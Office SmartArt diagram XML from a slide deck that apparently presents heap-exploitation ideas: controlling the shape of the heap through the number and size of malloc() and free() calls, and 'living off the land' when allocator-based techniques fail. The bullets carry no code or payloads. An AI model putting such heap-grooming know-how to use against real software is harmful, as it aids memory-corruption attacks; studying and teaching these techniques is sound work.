    <dgm:cxn modelId="{3F3906DA-EBED-4746-9FC1-DB65424B86E3}" type="presParOf" srcId="{99B86EA1-3B4F-BD4C-9DEA-924C7FC19CF4}" destId="{94912B45-798C-0F43-A383-09A3E298E6C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5BC94DED-3EE1-3E49-8B98-7F45BFEED6C0}" type="presParOf" srcId="{99B86EA1-3B4F-BD4C-9DEA-924C7FC19CF4}" destId="{DC257186-8BE0-314E-99F1-B94DBE6E2488}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CB884E75-C49E-7842-8483-B1D36F875C1E}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{B5065B2F-00BD-BF4B-9A28-D22B4389B51F}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DBB7AA9E-8140-8743-A536-6652F0E87D45}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{B2B2437E-A3F0-614E-9862-B6D2D1DAF289}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F1C44F07-4B5D-B148-A34F-E1993C65FFFF}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{FCC18504-3C26-6646-AD73-F3DB3E3E63C0}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A8D2EBC2-8F2C-9141-ABF5-4877D119FAC5}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{258AA88E-4A35-2B49-A906-BDA69A2507D4}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EE5543E8-C492-9F42-9F14-7BB146AE6FF4}" type="presParOf" srcId="{258AA88E-4A35-2B49-A906-BDA69A2507D4}" destId="{E08B2B21-1F93-E245-8A49-11A23BA58DF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5A4CBDDD-16FC-BC48-8606-AA87234E74D8}" type="presParOf" srcId="{258AA88E-4A35-2B49-A906-BDA69A2507D4}" destId="{DF93BF18-2193-C44A-A20B-65338489AC29}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F3674B0F-5BE2-DF4D-803B-80AEA42518BE}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{598A9B79-BB95-8647-BA99-BB22EB2B440D}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1D6CAA6B-C79E-864C-8DE3-AC519DEFCDE1}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{89AD06F3-BF00-7145-8B03-1BCA279280F8}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0A054B3C-8E47-3F45-BC94-E6BEA3C25738}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{2B2B855D-1F8C-4E4B-BC6C-39DE7FBBE637}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{693C798F-AFAC-F540-B4CD-4B997D55FFC6}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{46D12188-12F8-2E46-8180-05CFD4EF3FFA}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D59C7415-CD3D-1741-BBE0-EEF6B8BE49C2}" type="presParOf" srcId="{46D12188-12F8-2E46-8180-05CFD4EF3FFA}" destId="{FD4B9195-C049-1542-BA91-309152EF96A7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A7849BAA-3E4C-9A4F-BD3C-2D2366F92878}" type="presParOf" srcId="{46D12188-12F8-2E46-8180-05CFD4EF3FFA}" destId="{6E6396B2-B749-A146-97EF-77F9C856450F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FC182420-5238-E945-A314-3CE736A2D4D2}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{E132D0F2-93C3-9E43-BF2E-2BBCBD22740C}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8B18A016-8357-7247-AD37-480C3E7D734F}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{120E51CA-335C-E044-B1D4-4611BAE02C7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F97C5D-029D-4D48-BCDA-75E6FF4ABEF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0404987-BF29-41BB-A860-5822B9E1A798}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Easy way to control the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1" i="1" u="sng"/>
            <a:t>shape</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t> of the heap</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{281B0139-5A60-4476-9E9B-B17F2161EFEA}" type="parTrans" cxnId="{D96A1EBB-C33B-43C1-966D-7DF2C1EC6554}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F55C6944-46DD-4CDB-A079-BF8AFFE3097B}" type="sibTrans" cxnId="{D96A1EBB-C33B-43C1-966D-7DF2C1EC6554}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27622281-496A-4BF6-BDA0-4C5C21EFC31B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Calls to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>malloc() </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>&amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>free() </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>with lots of control</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D3ACF81A-C713-4D97-B3BB-E6D5ADFA8900}" type="parTrans" cxnId="{8D0EEDA5-5099-4F96-A1F5-21EE19AE14BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{01423F21-90C4-406B-B748-4F0CDA7248DB}" type="sibTrans" cxnId="{8D0EEDA5-5099-4F96-A1F5-21EE19AE14BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7DC35EF-5180-415C-834A-4CB26AF4A4A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="1" u="sng"/>
            <a:t>Amount</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t> of allocations/frees</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A50AC124-1ACA-4643-948E-6C08ACF74047}" type="parTrans" cxnId="{45CC90AF-3276-4CE0-BD5A-F89FFF64A677}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{506F3CE6-16C4-4604-BDFC-9771FEE171A9}" type="sibTrans" cxnId="{45CC90AF-3276-4CE0-BD5A-F89FFF64A677}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD090837-8441-4DC7-B5F7-BE2B8145CBD2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="1" u="sng"/>
            <a:t>Size</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t> of allocations/frees</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{464FDEEC-834B-46BF-B5D4-43C0122CA0BE}" type="parTrans" cxnId="{16E35751-2D38-4510-852D-3F5A9B75D80C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{029AD50B-D804-4A8B-A326-9D046345C298}" type="sibTrans" cxnId="{16E35751-2D38-4510-852D-3F5A9B75D80C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" type="pres">
      <dgm:prSet presAssocID="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2F61BD3B-5BE1-BC49-BD74-96BCC9800964}" type="pres">
      <dgm:prSet presAssocID="{40404987-BF29-41BB-A860-5822B9E1A798}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{670937FC-D4FF-E146-AE94-618314D5FAC5}" type="pres">
      <dgm:prSet presAssocID="{F55C6944-46DD-4CDB-A079-BF8AFFE3097B}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{46C2DB11-403D-084C-9CEE-E4C6D43A4FD7}" type="pres">
      <dgm:prSet presAssocID="{27622281-496A-4BF6-BDA0-4C5C21EFC31B}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CF6972D1-DF58-C144-81E3-091E32DD0B91}" type="pres">
      <dgm:prSet presAssocID="{01423F21-90C4-406B-B748-4F0CDA7248DB}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ABBE7F2A-F497-DB4E-B666-CE6AE87251AF}" type="pres">
      <dgm:prSet presAssocID="{D7DC35EF-5180-415C-834A-4CB26AF4A4A8}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ECC2835A-527C-224C-8CBA-B1AD00BCD09B}" type="pres">
      <dgm:prSet presAssocID="{506F3CE6-16C4-4604-BDFC-9771FEE171A9}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB096D44-F5EE-3F49-94B3-3DC92C39AA3C}" type="pres">
      <dgm:prSet presAssocID="{AD090837-8441-4DC7-B5F7-BE2B8145CBD2}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{0F72F507-E9D0-9440-B3EB-B2D263AB4E0A}" type="presOf" srcId="{AD090837-8441-4DC7-B5F7-BE2B8145CBD2}" destId="{BB096D44-F5EE-3F49-94B3-3DC92C39AA3C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DD5DC038-A742-434B-BCFA-E877A5326C85}" type="presOf" srcId="{40404987-BF29-41BB-A860-5822B9E1A798}" destId="{2F61BD3B-5BE1-BC49-BD74-96BCC9800964}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{16E35751-2D38-4510-852D-3F5A9B75D80C}" srcId="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" destId="{AD090837-8441-4DC7-B5F7-BE2B8145CBD2}" srcOrd="3" destOrd="0" parTransId="{464FDEEC-834B-46BF-B5D4-43C0122CA0BE}" sibTransId="{029AD50B-D804-4A8B-A326-9D046345C298}"/>
    <dgm:cxn modelId="{8FE65E82-11C8-2646-9577-CAC00DBF7CDC}" type="presOf" srcId="{D7DC35EF-5180-415C-834A-4CB26AF4A4A8}" destId="{ABBE7F2A-F497-DB4E-B666-CE6AE87251AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{829AC38D-A5EF-1247-BF52-89CE38FE2FD8}" type="presOf" srcId="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" destId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8D0EEDA5-5099-4F96-A1F5-21EE19AE14BE}" srcId="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" destId="{27622281-496A-4BF6-BDA0-4C5C21EFC31B}" srcOrd="1" destOrd="0" parTransId="{D3ACF81A-C713-4D97-B3BB-E6D5ADFA8900}" sibTransId="{01423F21-90C4-406B-B748-4F0CDA7248DB}"/>
    <dgm:cxn modelId="{45CC90AF-3276-4CE0-BD5A-F89FFF64A677}" srcId="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" destId="{D7DC35EF-5180-415C-834A-4CB26AF4A4A8}" srcOrd="2" destOrd="0" parTransId="{A50AC124-1ACA-4643-948E-6C08ACF74047}" sibTransId="{506F3CE6-16C4-4604-BDFC-9771FEE171A9}"/>
    <dgm:cxn modelId="{D96A1EBB-C33B-43C1-966D-7DF2C1EC6554}" srcId="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" destId="{40404987-BF29-41BB-A860-5822B9E1A798}" srcOrd="0" destOrd="0" parTransId="{281B0139-5A60-4476-9E9B-B17F2161EFEA}" sibTransId="{F55C6944-46DD-4CDB-A079-BF8AFFE3097B}"/>
    <dgm:cxn modelId="{90C27EEA-D8C6-A247-B5C5-4DB646824D2D}" type="presOf" srcId="{27622281-496A-4BF6-BDA0-4C5C21EFC31B}" destId="{46C2DB11-403D-084C-9CEE-E4C6D43A4FD7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B442D91E-BFD9-6D4A-89AB-5BD6942D5273}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{2F61BD3B-5BE1-BC49-BD74-96BCC9800964}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B01918F7-EDB6-1D42-9B30-2B304D3521EE}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{670937FC-D4FF-E146-AE94-618314D5FAC5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DACF28D2-25AF-6E41-B8EF-76E5D51077EF}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{46C2DB11-403D-084C-9CEE-E4C6D43A4FD7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5780DED3-3763-1145-A61E-0CA5FFE6457F}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{CF6972D1-DF58-C144-81E3-091E32DD0B91}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C0AB083F-8EC1-A34B-BD7A-4BDCB04B7E98}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{ABBE7F2A-F497-DB4E-B666-CE6AE87251AF}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{94572269-E783-9344-8E6B-29E2FBC73319}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{ECC2835A-527C-224C-8CBA-B1AD00BCD09B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D6C65A47-2D31-A24A-9EC3-58E25C914620}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{BB096D44-F5EE-3F49-94B3-3DC92C39AA3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732F61-6057-46A8-BCE5-57D63FA1C0B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BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:defRPr cap="all"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Allocator based techniques don’t always work</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BED1DFED-E640-466B-9EAF-4F770342991E}" type="parTrans" cxnId="{658E5F03-7272-4C97-8374-975EC3B56804}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A875749A-B507-40EF-97FD-CFB0B9D6F4AF}" type="sibTrans" cxnId="{658E5F03-7272-4C97-8374-975EC3B56804}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:defRPr cap="all"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Living off the land</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB2E0FDA-C99D-4CE3-8FC0-5B44E632C25A}" type="parTrans" cxnId="{586ED6EF-4B78-4654-B112-F5BD09A199C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED462EBA-B153-432D-BE80-83B70E93AECA}" type="sibTrans" cxnId="{586ED6EF-4B78-4654-B112-F5BD09A199C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7FBB022-6CA5-4097-8D36-A806A28C1EA2}" type="pres">
      <dgm:prSet presAssocID="{71732F61-6057-46A8-BCE5-57D63FA1C0B3}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" type="pres">
      <dgm:prSet presAssocID="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{80709741-BCF9-496F-93DB-5ED46C7DE7D9}" type="pres">
      <dgm:prSet presAssocID="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{81D9F4EC-ADC8-4A2B-8B80-76608FFCA641}" type="pres">
      <dgm:prSet presAssocID="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F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F99A9427-E97A-499E-A106-0DD0EC946863}" type="pres">
      <dgm:prSet presAssocID="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5248EB95-1FD8-4043-9E37-704C714EB774}" type="pres">
      <dgm:prSet presAssocID="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4418884B-61B8-438C-8CD9-19403E00EBE7}" type="pres">
      <dgm:prSet presAssocID="{A875749A-B507-40EF-97FD-CFB0B9D6F4AF}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" type="pres">
      <dgm:prSet presAssocID="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C102885D-AD41-441B-8AF8-DE058AFDB7A3}" type="pres">
      <dgm:prSet presAssocID="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B2913E4-0101-43A5-9C50-C90938DB4DFB}" type="pres">
      <dgm:prSet presAssocID="{358F7C0A-867F-45E7-B16B-C573BF7E99A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5A283E68-9ED5-481E-8805-193B96B8FA7B}" type="pres">
      <dgm:prSet presAssocID="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{71CFAF0E-F629-4D86-9C84-A21BF36CE7C3}" type="pres">
      <dgm:prSet presAssocID="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{658E5F03-7272-4C97-8374-975EC3B56804}" srcId="{71732F61-6057-46A8-BCE5-57D63FA1C0B3}" destId="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" srcOrd="0" destOrd="0" parTransId="{BED1DFED-E640-466B-9EAF-4F770342991E}" sibTransId="{A875749A-B507-40EF-97FD-CFB0B9D6F4AF}"/>
    <dgm:cxn modelId="{68014A3B-9497-43D9-8227-8824E1C55421}" type="presOf" srcId="{71732F61-6057-46A8-BCE5-57D63FA1C0B3}" destId="{A7FBB022-6CA5-4097-8D36-A806A28C1EA2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{6FF316D4-A1D2-4570-BA4D-15DEC67DF842}" type="presOf" srcId="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" destId="{5248EB95-1FD8-4043-9E37-704C714EB774}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{F5EA5BED-E98B-4630-8CC0-77D6D0CD84D0}" type="presOf" srcId="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}" destId="{71CFAF0E-F629-4D86-9C84-A21BF36CE7C3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{586ED6EF-4B78-4654-B112-F5BD09A199C6}" srcId="{71732F61-6057-46A8-BCE5-57D63FA1C0B3}" destId="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}" srcOrd="1" destOrd="0" parTransId="{BB2E0FDA-C99D-4CE3-8FC0-5B44E632C25A}" sibTransId="{ED462EBA-B153-432D-BE80-83B70E93AECA}"/>
    <dgm:cxn modelId="{8790A1A0-FC8D-4521-89B6-FEB0908C9E20}" type="presParOf" srcId="{A7FBB022-6CA5-4097-8D36-A806A28C1EA2}" destId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{C1873879-3494-453C-8312-8E0C3B67E1BB}" type="presParOf" srcId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" destId="{80709741-BCF9-496F-93DB-5ED46C7DE7D9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{4D843992-E351-4444-A848-830E504BEC7D}" type="presParOf" srcId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" destId="{81D9F4EC-ADC8-4A2B-8B80-76608FFCA641}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{AF7D5951-8EA8-483E-BC34-7361AF74F9F1}" type="presParOf" srcId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" destId="{F99A9427-E97A-499E-A106-0DD0EC946863}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{A71BD63C-0AC2-4EEB-AD8C-15B0F993FAAE}" type="presParOf" srcId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" destId="{5248EB95-1FD8-4043-9E37-704C714EB774}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
